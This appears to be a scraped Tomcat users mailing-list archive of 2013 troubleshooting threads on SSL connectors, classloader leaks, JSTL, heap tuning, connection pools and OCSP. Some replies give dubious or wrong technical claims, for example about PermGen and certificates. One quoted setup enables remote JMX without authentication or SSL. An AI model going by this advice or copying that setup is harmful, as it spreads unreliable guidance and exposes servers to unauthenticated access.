Anil if you want JSSE Handshaking to be enabled on server enable AprLifecycle Listener on server.xml e.g. Listener className=org.apache.catalina.core.AprLifecycleListener SSLEngine=on / Any WebServer (including Tomcat) has no knowledge of external HTML Servers around it you should use netstat netstat -ab | grep 443 Tell us what you see Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. From: anigo...@cisco.com To: users@tomcat.apache.org Subject: RE: Customizing SSL in HttpClient Date: Tue, 11 Jun 2013 06:29:05 + -Original Message- From: Anil Goyal -X (anigoyal - Aricent Technologies at Cisco) Sent: Tuesday, June 11, 2013 11:23 AM To: Tomcat Users List Subject: RE: Customizing SSL in HttpClient -Original Message- From: Christopher Schultz [mailto:ch...@christopherschultz.net] Sent: Monday, June 10, 2013 7:51 PM To: Tomcat Users List Subject: Re: Customizing SSL in HttpClient -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Anil, On 6/10/13 8:42 AM, Anil Goyal -X (anigoyal - Aricent Technologies at Cisco) wrote: I am trying to create a http client and send a request to certain port of a server using below code: HttpClient client = new HttpClient(); client.getHostConfiguration().setHost(address, portNumber, protocol); Here portNumber that I am setting is 8444(https port of tomcat) When I execute client.executemethod() and at the server side when I tried to retrieve request.getRequestURL(), I am getting the url with port 443 not 8444 which I set in client. Even request.getServerPort is giving 443 not 8444. Is there any kind of port-forwarding or anything else going on? The things are working fine for 8081(http port of tomcat) i..e HttpClient client = new HttpClient(); client.getHostConfiguration().setHost(address, portNumber, protocol); Here portNumber that I am setting is 8081(https port of tomcat) When I execute client.executemethod() and at the server side when I tried to retrieve request.getRequestURL(), I am getting the url with port 8081 which I set in client. Even request.getServerPort is giving 8081. Can you show us a bit more of the code? It's not clear from you client code that the port number is set correctly, and you only mentioned the server. Can you give us some of that, too? Also, what do your Connector elements look like in server.xml? - -chris -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCAAGBQJRteC5AAoJEBzwKT+lPKRY8TUP/3QuIqKPxB5HjVaUywkPmIQt +LoZLdHhOLdrkwE2ojW1qk0YnX2wpgr6W3W6uBk5l5yrrdcHAFcOWcNIi9fjl8bo xW8uZi+vGkyv1Pdii5JJrfDjbxdtbsTpHBn7yoKMUzJ9V9xmHwqNsi89xi/mZLty hj6LNMvftgpQQdPmoPoLJr4ZfmQj2DAI+wX0u/fNgk8cf5wdHJZZu03COPIeRbam Gn+fOjfK0YL93ntmLP2PbGtlCprBaqPcZRh+AiKFhg4W7+qGVDXGa2SIvrcWbgdU qHRKxyJ+5j3o0Y74Q0wKRcSEUXbidEhDAtJCQgNOJJi+S4SYgl2OLOXhkxMABBkS xYIXsAPu4SoVcuiCpGvb2LhD5uqMOyH0NxCpv/TVFsEzOy2EZHLrts1DYNAyIo7M zqZv2efOTPwcaHRZxgzUB2s23uzs3aiXiKOzYHB7AALJnASCx4fNeOgZwMxdK6o0 qs09m0EKL29QurG3iKXHCA0dOeZzxV4ZUduFZtR2eLIsayqoKpL6fh+asLZFW40y ZMOvPzlpXwdRX36IdzwTlwrvMOmynfgGfL/yAdCfqN0hlA0OVo7PYNryxSfZhX+2 O1//zDFNSxs2BS9ErQkNyKP8xfVk76XbYUybsbNtivnxjv1a8N72h3qeuixA/ZUJ gJEvsTX0kD+rb8xYmIlJ =Qqhu -END PGP SIGNATURE- - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org Please consider the code flow as below: HttpClient client = new HttpClient(); portNumber = secure ? LocalNetworkConstants.DEFAULT_HTTPS_PORT : LocalNetworkConstants.DEFAULT_HTTP_PORT; // DEFAULT_HTTPS_PORT=8444 and DEFAULT_HTTP_PORT=8081 define in LocalNetworkConstants.java LOG.debug(the value of https port is+String.valueOf(portNumber)); if (secure) { Protocol
RE: Illegal access: this web application instance has been stopped already and NoClassDefFoundError
I org.apache.zookeeper.ClientCnxn$SendThread.run(ClientCnxn.java:1115) Caused by: java.lang.ClassNotFoundException: org.apache.zookeeper.server.ZooTrace MGput zookeeper*.jar on CLASSPATH at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1711) at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1556) ... 1 more at the same time,the following is also in catalina.out: INFO: Illegal access: this web application instance has been stopped already. Could not load org.apache.zookeeper.server.ZooTrace. The eventual following stack trace is caused by an error thrown for debugging purposes as well as to attempt to terminate the thread which caused the illegal access, and has no functional impact. java.lang.IllegalStateException at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1597) at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1556) at org.apache.zookeeper.ClientCnxn$SendThread.run(ClientCnxn.java:1115) I searched google and mail list ,couldn't find any solution,please help me. Enviroment info: JDK:1.6.0_45 Tomcat:7.0.40 Zookeeper:3.4.5 Can you give us any more of the stack trace? It looks like this is happening during shutdown, but all the ServletContextListeners should complete before the WebappClassLoader starts shedding its loaded classes. Are you explicitly shutting-down the ClientCnxn thread in a SCL's destroy() method? If not, you need to do that. Sorry,I can't get any more of the stack trace. We wrapped zookeepr client as a spring bean and invoked method close of zookeeper in destory-method of bean,in that method close,zookeeper Send Thread was closed. When tomcat was shut down, Spring closed it's container and bean was detroyed, then destroy-method of bean was invoked. I'am confusing why is Send Thread of Zookeeper seemed to exit slower than the WebappClassLoader shedding its loaded classes. ps: details of zookeeper closing org.apache.zookeeper.Zookeeper public synchronized void close() throws InterruptedException { if (!cnxn.getState().isAlive()) { if (LOG.isDebugEnabled()) { LOG.debug(Close called on already closed client); } return; } if (LOG.isDebugEnabled()) { LOG.debug(Closing session: 0x + Long.toHexString(getSessionId())); } try { cnxn.close(); } catch (IOException e) { if (LOG.isDebugEnabled()) { LOG.debug(Ignoring unexpected exception during close, e); } } LOG.info(Session: 0x + Long.toHexString(getSessionId()) + closed); } -- org.apache.zookeeper.ClientCnxn public void close() throws IOException { if (LOG.isDebugEnabled()) { LOG.debug(Closing client for session: 0x + Long.toHexString(getSessionId())); } try { RequestHeader h = new RequestHeader(); h.setType(ZooDefs.OpCode.closeSession); submitRequest(h, null, null, null); } catch (InterruptedException e) { // ignore, close the send/event threads } finally { disconnect(); } } public void disconnect() { if (LOG.isDebugEnabled()) { LOG.debug(Disconnecting client for session: 0x + Long.toHexString(getSessionId())); } sendThread.close(); eventThread.queueEventOfDeath(); } - org.apache.zookeeper.ClientCnxn.SendThread void close() { state = States.CLOSED; clientCnxnSocket.wakeupCnxn(); } @Override public void run() { clientCnxnSocket.introduce(this,sessionId); clientCnxnSocket.updateNow(); clientCnxnSocket.updateLastSendAndHeard(); int to; long lastPingRwServer = System.currentTimeMillis(); while (state.isAlive()) { try { if (!clientCnxnSocket.isConnected()) { if(!isFirstConnect){ try { Thread.sleep(r.nextInt(1000)); } catch (InterruptedException e) { LOG.warn(Unexpected exception, e); } } // don't re-establish connection if we are closing
RE: WebSockets Thread Safety question
/java/utiljavap Collections | grep synchronized public static java.util.Collection synchronizedCollection(java.util.Collecti on); static java.util.Collection synchronizedCollection(java.util.Collection, jav a.lang.Object); public static java.util.Set synchronizedSet(java.util.Set); static java.util.Set synchronizedSet(java.util.Set, java.lang.Object); public static java.util.SortedSet synchronizedSortedSet(java.util.SortedSet) ; public static java.util.List synchronizedList(java.util.List); static java.util.List synchronizedList(java.util.List, java.lang.Object); public static java.util.Map synchronizedMap(java.util.Map); public static java.util.SortedMap synchronizedSortedMap(java.util.SortedMap) ; use java.util.Collections.synchronizedList Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. From: ch...@derham.me.uk Date: Mon, 3 Jun 2013 07:42:01 -0300 Subject: Re: WebSockets Thread Safety question To: users@tomcat.apache.org When I use the syntax from the samples in the onTextMessage() method, I get ConcurrentModificationException if I have more than one client sending data to the server at the same time: for(MyMessageInbound mmib: mmiList){ CharBuffer buffer = CharBuffer.wrap(cb); mmib.myoutbound.writeTextMessage(buffer); mmib.myoutbound.flush(); } Changing it to the following works fine: for(int i = 0; i mmib.size(); i++) { MyMessageInbound mmib = mmiList.get(i); CharBuffer buffer = CharBuffer.wrap(cb); mmib.myoutbound.writeTextMessage(buffer); mmib.myoutbound.flush(); } However, this approach is not as efficient as to use an Iterator, unless I clone the mmiList Collection to iterate over it... Can you explain where is the in-efficiency? Thanks Chris - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: checkThreadLocalMapForLeaks: com.sun.xml.bind.v2.runtime.Coordinator
Hi Jesse you can configure your customised Jaxb factory implementor by implementing a jaxb.properties file with a javax.xml.bind.context.factory=value javax.xml.bind.context.factory=org.eclipse.persistence.jaxb.JAXBContextFactory be aware with key=value value is the name of the class that implements the createContext for Jaxb http://docs.oracle.com/javaee/5/api/javax/xml/bind/JAXBContext.html Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Sun, 19 May 2013 12:39:12 -0400 Subject: checkThreadLocalMapForLeaks: com.sun.xml.bind.v2.runtime.Coordinator From: jie...@gmail.com To: users@tomcat.apache.org Greetings, I am using Apache Tomcat 7.0.40, via IBM Java 7 SR2. I am seeing the following on Tomcat shutdown: org.apache.catalina.loader.WebappClassLoader.checkThreadLocalMapForLeaks The web application [] created a ThreadLocal with key of type [com.sun.xml.bind.v2.runtime.Coordinator$1] (value [com.sun.xml.bind.v2.runtime.Coordinator$1@f9b00906]) and a value of type [java.lang.Object[]] (value [[Ljava.lang.Object;@3d8d9b93]) but failed to remove it when the web application was stopped. Threads are going to be renewed over time to try and avoid a probable memory leak. When I inspect the libraries within the application I find: $ grep com.sun.xml.bind.v2.runtime.Coordinator * Binary file jaxb-impl-2.2.1.1.jar matches Apache Maven dependency:tree shows that this is coming from Apache Wink (wink-common - wink-client). Is this JAXB ThreadLocal something that Apache Tomcat ought to protect me from? Thank you, -Jesse - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: getting the request that created the session
org.apache.catalina.valves.RemoteIPValve getRemoteIpHeader? Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Sat, 27 Apr 2013 23:08:31 +0200 Subject: getting the request that created the session From: rosenberg.l...@gmail.com To: users@tomcat.apache.org Hi, is there any possibility to get the first request from a session (or any request from a session) from the HttpSessionListener. Background, I want to count sessions by top level domains. I'm doing it now in a combination of filter and listener. Filter for new sessions, putting a mark for already counted sessions, and listener for destroyed session. However, I would like to get rid of the Filter, if its possible somehow. For that, I need to get user's ip adress somehow. thanks in advance Leon
RE: JSTL XML Basic Question
Jerry You'll need core taglib and xml taglib e.g. http://www.tutorialspoint.com/jsp/jstl_xml_out_tag.htm declaration:%@ taglib prefix=c uri=http://java.sun.com/jsp/jstl/core; % %@ taglib prefix=x uri=http://java.sun.com/jsp/jstl/xml; % use core taglib to set var:c:set var=xmltext books book namePadam History/name authorZARA/author price100/price /book book nameGreat Mistry/name authorNUHA/author price2000/price /book /books /c:set use xml taglib to set parse var: x:parse xml=${xmltext} var=output/ use xml taglib to set output the parsed textx:out select=$output/books/book[1]/name / http://www.tutorialspoint.com/jsp/jstl_xml_out_tag.htm Martin__ Jogi és Bizalmassági kinyilatkoztatás/Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Ez az üzenet bizalmas. Ha nem ön az akinek szánva volt, akkor kérjük, hogy jelentse azt nekünk vissza. Semmiféle továbbítása vagy másolatának készítése nem megengedett. Ez az üzenet csak ismeret cserét szolgál és semmiféle jogi alkalmazhatósága sincs. Mivel az electronikus üzenetek könnyen megváltoztathatóak, ezért minket semmi felelöség nem terhelhet ezen üzenet tartalma miatt. Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Sat, 20 Apr 2013 13:14:21 -0500 Subject: JSTL XML Basic Question From: 2ndgenfi...@gmail.com To: users@tomcat.apache.org I have been searching for several hours for a basic JSTL answer with no luck. From what I can tell, JSTL is under the umbrella of Tomcat. Hopefully someone can help me out. I simply want to use an existing already-parsed DOM (org.w3c.dom.Document variable) with JSTL XML tags. In other words, I want to skip the x:parse step and just tell x:out and all of the other x tags to pull data from my pre-existing pre-parsed DOM: Document myDOM; // already built by another part of the code I understand basic xpath stuff. But I'm not sure how to tell it to use a standard local java variable for the DOM. I've tried x:out select=$myDOM/a/b/ and x:out select=${myDOM}/a/b/ Both give me errors that seem to say it doesn't find a DOM. Every example I can find always assumes I want to start with a true non-parsed XML document. I'm sure I'm missing something obvious. But can someone please help me out with the correct syntax? Thanks. Jerry
RE: RE : Tomcat 6.0.35 Crashed again
you need to do take a look at the loaded JSF webapps and find outwho is acquiring a resource and not closing the resource who is acquiring large amounts of heap and not releasingbe aware any reference to an any object in another class gives the class the right to be placed into PermGenHibernate with cglib proxies are notorious memory hogs awatch your PermGen get pegged when Hibernate and cglib proxies are loadedStatics are another set of culprits of of heap usage Remember all long lived heap objects are eventually placed into Permgen Find the tools to track eden heap, tenured heap and PermGen http://www.integratingstuff.com/2011/07/24/understanding-and-avoiding-the-java-permgen-space-error/ get familiar with taking heap dumps with jmap and analyzing with jhathttp://javarevisited.blogspot.com/2011/05/java-heap-space-memory-size-jvm.html Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Thu, 11 Apr 2013 11:40:46 -0400 Subject: Re: RE : Tomcat 6.0.35 Crashed again From: smithh032...@gmail.com To: users@tomcat.apache.org On Thu, Apr 11, 2013 at 10:41 AM, Mark H. Wood mw...@iupui.edu wrote: Really, no one else can tell you what settings to use. The best we can hope for is some accepted rules of thumb *as starting points* for further tuning. +1 to Dan, Neven, and Mark's responses. Please consider-or-do 'everything' that they mentioned/recommended. I did want to share my java settings for my currently-considered-a-low-scale JSF web app running on Windows Server 2008 R2 64bit server with 32GB RAM. -XX:HeapDumpPath=D:\apache-tomee-plus-1.6.0-SNAPSHOT\temp -XX:+HeapDumpOnOutOfMemoryError -Djava.awt.headless=true -Dcom.sun.management.jmxremote.port=422 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false -Xms1024m -Xmx1024m -XX:MaxPermSize=384m -XX:+UseTLAB -XX:+UseConcMarkSweepGC -XX:+CMSClassUnloadingEnabled I am very pleased with the GC performance of my app, and I do like to monitor the performance of the app via JMX remote connection via Java Visual VM. My app runs between 200m to 500m, but I am keeping Xms/Xmx=1024m just to see if I ever get an OOME; so far, so good (never experienced an OOME), but recently, I did experience some unexpected/unwanted behavior with one of my @Schedule processes which was attempting to sync some data from database to/with Google Calendar, and google Calendar service returned google calendar error 503, and I recognized that the memory got up to 500m, and the google calendar error 503 did not resolve itself over an hour (@Schedule executes every 2 to 4 minutes, if error occurs, then data is appended to the queue for later retry attempt). I never seen that behavior and I don't know if I will see it again; i wish I would have done a 'heap dump' instead of a 'stop' tomee/tomcat. Everyday, I listen and read these questions/responses on tomcat list, and I can't believe that I forgot to do a 'heap dump'. :( Also, please note that I occasionally stop-deploy-and-start tomee/tomcat almost-on-a-daily-basis to deploy new app-or-configuration-or-library updates; also, the app or tomee (or tomcat) seem to accumlate threadlocals over time, and if uptime is 1 day, then I 'think' I see that memory is not released, and I think eventually as uptime increases, then the app/tomee/tomcat will result in OOME. :) At any rate, hope this helps. Howard
RE: Better SSL connector setup
Identification of keys and supported ciphers are an important for Key Exchange But before that happensThe certificates attributes are the only means the CA-Authority can verify the the name in the cert The certificate attributes should contain 1)1 and only 1 Hostname to contact 2)Identification information from a DN in LDAP or a suitably unique Name Service Server (ADS)allowing verification of client to a 'Name Service'http://docs.oracle.com/cd/E19575-01/820-3885/gimog/index.html Allowing your cert to authenticate to n hosts invites 2n as many potential DOS attacks Not requiring DN would negate the CA-Authority ability to verify DN CN == SSL-Host. Think of online banking and clients need to circumvent forged sites as 'The official bank site' to send your money If you are FE with Apache you will want to configure in mod-sslhttp://www.modssl.org/ Martin __ Verzicht und Vertraulichkeitanmerkung Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Date: Sun, 7 Apr 2013 11:40:24 -0700 From: its_toas...@yahoo.com To: users@tomcat.apache.org Subject: Re: Better SSL connector setup Some notes from October 2011 referenced below: On 4/7/2013 8:47 AM, Christopher Schultz wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Kevin, On 4/6/13 10:10 PM, Kevin Jenkins wrote: I have a server that has two hosts: First: http://masterserver2.raknet.com/ Second (using alias) https://lobby3.raknet.com https://milestone.lobby3.raknet.com:444/ https://milestone.lobby3.raknet.com:444/ I would like have access be on these specific URLS. Right now you can use untrusted URLs, such as https://masterserver2.raknet.com/ https://milestone.lobby3.raknet.com/ Additionally, I would like to access milestone.lobby3.raknet.com on port 443 rather than 444 (so that 443 does not display a warning like it does now). I setup two connectors because I did not know how else to specify there are two ssl certificate files If you want two separate hostnames served under HTTPS and you: a. Don't have a wildcard or other special type of certificate or b. Don't have Server Name Indication capabilities From the list archives: http://mail-archives.apache.org/mod_mbox/tomcat-users/201110.mbox/%3c1318710394.66976.yahoomail...@web125511.mail.ne1.yahoo.com%3E Wildcard certificates would work in this case because the hosts are part of the same domain. SNI is apparently client-side only for Java. ...then you will need to configure a Connector for each hostname on a separate interface/port combination with separate certificates. The easiest way to do this is to set up a second interface with a separate IP address. This is usually trivial to do, and it doesn't really interfere with networking on the server. Just create a second interface with a second IP address, map DNS properly, and then set up your web server to bind specifically to the second IP address for the second hostname's SSL virtual host. In a Tomcat-only setup this is the way to go. Secondary or virtual IP addresses are easy to set up. Your Connectors look just fine (other than the use of port 444, of course). Once you have a second interface/IP, you'll want to use the address attribute of the Connector to choose the interface to listen on. I would choose one Connector to listen on *all* interfaces to be a catch-all in case your IP address(es) change(s) and you forget to re-configure everything: a security warning due to a mismatched-host is better for users than an unreachable host. - -chris The other solution is to front the Tomcat systems with an Apache HTTPD server and use named virtual hosts in SSL. Apparently the configuration checking routine throws a warning on startup, but the actual configuration works (on Apache HTTPD 2.2, I've not tried 2.4). . . . . just my two cents. /mde/ - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: IIS and Tomcat workers groups
The only way I know how is to have IIS route all requests to a Proxy (such as Squid) http://wiki.squid-cache.org/Features/Redirectors The Proxy Server (Squid) can redirect to LB all requests for GroupNode1 and GroupNode2 Saludos Cordiales desde EEUU Martin __ Porfavor..no altere ni interrumpir esta communicacion..Gracias Date: Thu, 4 Apr 2013 10:14:50 +0100 From: miguel_3_gonza...@yahoo.es Subject: IIS and Tomcat workers groups To: users@tomcat.apache.org Dear all, We currently have an IIS 6 fronting several Tomcat 6 containers with a list of workers for each redirection we want to forward from IIS to each tomcat. We are thinking of migrating to IIS 7.5 and Tomcat 7. Also we would like that two of the nodes share the same redirection and so we can balance the load to two servers instead of having one server. Is it possible that two of the nodes are balanced in a group while the other nodes are stand-alone? Many thanks Miguel
RE: Analyzing Connection Pool Errors/Leaks
Never met GK but there are a few things that he needs to implement to make Hibernate Production-Ready 1)Deprecate the home-made bag classes ..collection classes have been out for the better part of 5 years ..and force the op to upgrade their JDK to AT LEAST 1.5 to use ArrayListBagClass..Bag classes add unneccesary load and overhead and any overhead is bad 2)Close your LRU ResultSets 3)Close your LRU StatementHandles 4)Close your LRU Cursors 5)Close your LRU Connections 6)Allow hinting..I dont want Any Hibernate query to do FTS when there is a perfectly good index waiting to be used Why the rant: 1 1/2 years ago I visited a high-profile client that was processing a million transactions a day and Hibernate was mucking the process so intrusively the client said rewrite 1000_ Hibernate calls to straight queries to quote a Cambridge Maven..Hibernate is more trouble than its worth My 2 cents Martin Gainty __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité . Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Subject: Re: Analyzing Connection Pool Errors/Leaks From: dmik...@vmware.com Date: Mon, 1 Apr 2013 17:11:50 -0400 To: users@tomcat.apache.org On Apr 1, 2013, at 4:18 PM, David Landis wrote: Thanks for the response, see my comments inline below. On Mon, Apr 1, 2013 at 3:49 PM, Daniel Mikusa dmik...@vmware.com wrote: On Apr 1, 2013, at 3:31 PM, David Landis wrote: Hi guys, When running a performance test on my system it starts fine, but after a while I start getting errors in my application log such as (see the bottom for full stack trace): 2013-03-29 16:38:54,778 ERROR [org.hibernate.engine.jdbc.spi.SqlExceptionHelper] - [SimpleAsyncTaskExecutor-12842] - [SimpleAsyncTaskExecutor-12842] Timeout: Pool empty. Unable to fetch a connection in 30 seconds, none available[size:80; busy:0; idle:0; lastwait:3]. This means you have no connections in your pool and it's unable to create a new connection to your database. OK, I'll have to investigate the DB setting more thoroughly. The maximum sessions and processes in Oracle are higher than we were using for the test though (several hundred). Questions: 1.) I'm a little confused about what it means if no connections are available and yet none are busy nor idle. What are the other available states? The pool is empty. Further more the error above means that it can't create a new connection either. Maybe your network failed? or the DB kicked off all your application's connections? Actually Oracle was showing 70+ inactive sessions for my app even though the connection pool was showing empty. Possible you are hitting a bug. You might also want to try an upgrade of Tomcat. You're a couple versions back at 7.0.32. You can see what was fixed by searching for jdbc-pool in the ChangeLog. https://tomcat.apache.org/tomcat-7.0-doc/changelog.html Dan Were you ever able to get a connection to the DB? If you restart Tomcat, can you get connections to the DB again? Yes, restarting Tomcat results in a fresh pool of DB connections and the 70+ inactive sessions on the DB side are gone and replaced by 10 which is the initial size of the pool. Also, are there any limits on your DB user's account that might cause problems with your performance tests? Not that I know of, but I'll look further. I was expecting problems with the perf test eventually b/c it was set to simulate a couple hundred users and I only maxActive set to 80. That is fine. I'm more concerned with why the connection pool didn't eventually recover. 2.) My other point of confusion is that assuming there is a connection leak in the application, shouldn't setting removeAbandoned=true cause the DB connections to eventually be recovered? Yes. What I am seeing is that even after a couple days of no application usage now I'm still getting
RE: OCSP with TOMCAT 7
so you want Tomcat7 to act as an OCSP Responder? download and install ocsp daemon ..this is not trivial as you will need to be able to communicate to a working LDAP server http://www.openca.org/projects/ocspd/ configure your servlet to serve its requests to ocsp-daemon calls.. configure the servlet to serve the response with the results from the ocsp-daemon Please explain why you want to FE the ocspd request instead of calling the daemon directly? Martin __ Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung fuer den Inhalt uebernehmen. Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le destinataire prévu, nous te demandons avec bonté que pour satisfaire informez l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est interdite. Ce message sert à l'information seulement et n'aura pas n'importe quel effet légalement obligatoire. Étant donné que les email peuvent facilement être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité pour le contenu fourni. Date: Thu, 21 Mar 2013 10:08:08 +0100 From: a...@ice-sa.com To: users@tomcat.apache.org Subject: Re: OCSP with TOMCAT 7 Amit A wrote: Could not find anything achived on this topic Search query: http://marc.info/?l=tomcat-userw=2r=1s=tomcat+ocspq=t Further pointers please? 15/03/2013, subject Standard or OCSP Native Lib?, Nick Williams ? On Wed, Mar 20, 2013 at 4:23 PM, André Warnier a...@ice-sa.com wrote: Amit A wrote: I need to enable OCSP on my application which is running Tomcat 7.0.29. Looked up the documentation but did not find quite much : http://tomcat.apache.org/**tomcat-7.0-doc/ssl-howto.htmlhttp://tomcat.apache.org/tomcat-7.0-doc/ssl-howto.html 1. Is OCSP with just tomcat actually possible? Do we need a external module/software? 2. Has anyone implemented/Configured OCSP with Tomcat? I am looking for the nitty gritties here. Search the list archives. There was a question/response about this exact subject just a few days ago. --**--**- To unsubscribe, e-mail: users-unsubscribe@tomcat.**apache.orgusers-unsubscr...@tomcat.apache.org For additional commands, 